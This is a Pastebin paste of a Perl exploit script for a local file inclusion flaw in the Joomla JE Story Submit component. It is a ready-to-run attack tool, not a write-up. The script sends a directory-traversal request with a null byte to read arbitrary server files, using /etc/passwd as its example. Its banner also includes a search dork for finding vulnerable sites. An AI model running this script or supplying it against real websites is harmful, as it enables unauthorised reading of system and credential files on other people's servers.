Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /usr/bin/perl -w
- # Joomla Component JE Story Submit Local File Inclusion Vulnerability
- # Author : K1LL57R34K (Pwnd Brasil)
- # Date : July, 21-2011 GMT +7:00 São Paulo, Brazil.
- # Software : JE Story Submit
- # Vendor : http://joomlaextensions.co.in/
- # License : GPLv2 or later
- # Tested On: Joomla 1.5.x
- #
- # PoC - http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00
- #
- use LWP::UserAgent;
- use HTTP::Request::Common;
- my ($host, $file) = @ARGV ;
- sub clear{
- system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
- clear();
- print "|==========================================================|\n";
- print "| 'Joomla Component JE Story Submit Local File Inclusion' |\n";
- print "| Coded by : K1LL57R34K |\n";
- print "| Dork : inurl:com_jesubmit |\n";
- print "| |\n";
- print "| http://twitter.com/pwndbrasil |\n";
- print "| |\n";
- print "|===================================[ YOGYACARDERLINK ]====|\n";
- print "\nUsage: perl $0 <target> <file_to_edit>\n";
- print "\tex: perl $0 http://www.site.com /etc/passwd\n\n";
- $host = 'http://'.$host if ($host !~ /^http:/);
- $host .= "/" if ($host !~ /\/\$/);
- my $ua = LWP::UserAgent->new();
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
- $ua->timeout(10);
- my $request = HTTP::Request->new();
- my $response;
- my $url = $host."index.php?";
- my $req = HTTP::Request->new(POST => $host."index.php?");
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("option=com_jesubmit&view=".("/.."x10).$file."%00");
- $request = $ua->request($req);
- $result = $request->content;
- $result =~ s/<[^>]*>//g;
- print $result . "\n";
- exit;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement